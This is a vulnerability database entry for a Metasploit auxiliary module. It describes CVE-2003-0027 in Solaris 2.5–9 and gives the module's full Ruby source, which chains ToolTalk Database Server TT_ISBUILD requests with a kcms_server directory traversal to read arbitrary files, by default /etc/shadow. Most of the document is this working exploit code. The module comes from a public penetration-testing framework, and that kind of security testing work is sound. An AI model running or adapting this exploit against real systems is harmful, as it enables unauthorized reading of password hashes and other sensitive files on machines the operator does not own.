Solaris KCMS + TTDB Arbitrary File Read

2010-06-24T05:03:12
ID MSF:AUXILIARY/ADMIN/SUNRPC/SOLARIS_KCMS_READFILE
Type metasploit
Reporter Rapid7
Modified 2019-10-05T17:50:30

Description

This module targets a directory traversal vulnerability in the kcms_server component from the Kodak Color Management System. By utilizing the ToolTalk Database Server\'s TT_ISBUILD procedure, an attacker can bypass existing directory traversal validation and read arbitrary files. Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both kcms_server and rpc.ttdbserverd must be running on the target host.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SunRPC

  def initialize
    super(
      'Name'           => 'Solaris KCMS + TTDB Arbitrary File Read',
      'Description'    => %q{
          This module targets a directory traversal vulnerability in the
        kcms_server component from the Kodak Color Management System. By
        utilizing the ToolTalk Database Server\'s TT_ISBUILD procedure, an
        attacker can bypass existing directory traversal validation and
        read arbitrary files.

        Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both
        kcms_server and rpc.ttdbserverd must be running on the target
        host.
      },
      'Author'         =>
        [
          'vlad902 <vlad902[at]gmail.com>', # MSF v2 module
          'jduck'  # Ported to MSF v3
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2003-0027'],
          ['OSVDB', '8201'],
          ['BID', '6665'],
          ['URL', 'http://marc.info/?l=bugtraq&m=104326556329850&w=2']
        ],
      # Tested OK against sol8.tor 20100624 -jjd
      'DisclosureDate' => 'Jan 22 2003')

    register_options(
      [
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'etc/shadow']),
        OptString.new('OUTPUTPATH', [ false, "Local path to save the file contents to", nil ])
      ])
  end

  def run

    # There is a fixed size buffer in use, so make sure we don't exceed it..
    # (NOTE: 24 bytes are reserved for traversal string)
    path = datastore['PATH']
    if (path.length > 1000)
      raise RuntimeError, "File name is too long."
    end

    print_status("Making request to the ToolTalk Database Server...")

    # Hopefully one of these works ;)
    ttdb_build("/etc/openwin/devdata/profiles/TT_DB/oid_container")
    ttdb_build("/etc/openwin/etc/devdata/TT_DB/oid_container")

    # If not, we'll find out now ...
    print_status("Making open() request to the kcms_server...")
    sunrpc_create('tcp', 100221, 1)
    sunrpc_authunix('localhost', 0, 0, [])

    # Prepare the traversing request for kcms_server
    trav = 'TT_DB/' + ('../' * 5) + path
    buf = Rex::Encoder::XDR.encode(
      [trav, 1024],
      0, # O_RDONLY
      0755) # mode

    # Make the request
    ret = sunrpc_call(1003, buf)
    ack, fsize, fd = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer)

    if (ack != 0)
      print_error("KCMS open() failed (ack: 0x%x != 0)" % ack)

      if (fsize == 0)
        print_status("File does not exist (or host is patched)")
      end
      return
    end

    # Nice, open succeeded, show the return data
    print_status("fd: #{fd}, file size #{fsize}")

    print_status("Making read() request to the kcms_server...")
    buf = Rex::Encoder::XDR.encode(
      fd,
      0,
      fsize)

    ret = sunrpc_call(1005, buf)
    x, data = Rex::Encoder::XDR.decode!(ret, Integer, [Integer])

    # If we got something back...
    if (data)
      data = data.pack('C*')

      # Store or display the results
      if (datastore['OUTPUTPATH'])
        fname = datastore['PATH'].gsub(/[\/\\]/, '_')
        outpath = File.join(datastore['OUTPUTPATH'], fname)
        print_status("Saving contents to #{outpath} ...")
        File.open(outpath, "wb") { |fd|
          fd.write(data)
        }
      else
        print_status("File contents:")
        print_status(data.inspect)
      end
    else
      print_error("No data returned!")
    end

    # Close it regardless if it returned anything..
    print_status("Making close() request to the kcms_server...")
    buf = Rex::Encoder::XDR.encode(fd)
    sunrpc_call(1004, buf)

    # done
    sunrpc_destroy

  rescue Timeout::Error, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Rex::Proto::SunRPC::RPCError => e
    print_error(e.to_s)
  rescue ::Rex::Proto::SunRPC::RPCTimeout
    print_warning 'Warning: ' + $!
    print_warning 'Exploit may or may not have succeeded.'
  end


  #
  # Send a TT_ISBUILD request to rpc.ttdbserverd
  #
  def ttdb_build(path)
    sunrpc_create('tcp', 100083, 1)
    sunrpc_authunix('localhost', 0, 0, [])
    msg = Rex::Encoder::XDR.encode(
      [path, 1024],
      path.length,
      1, # KEY (VArray head?)
      2,
      1,
      0, # KEYDESC
      2,
      1,
      # 21 zeros, /KEYDESC, /KEY
      0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
      0x10002,
      path.length)
    ret = sunrpc_call(3, msg)
    arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer)
    print_status("TTDB reply: 0x%x, %d" % arr)
    sunrpc_destroy
  end
end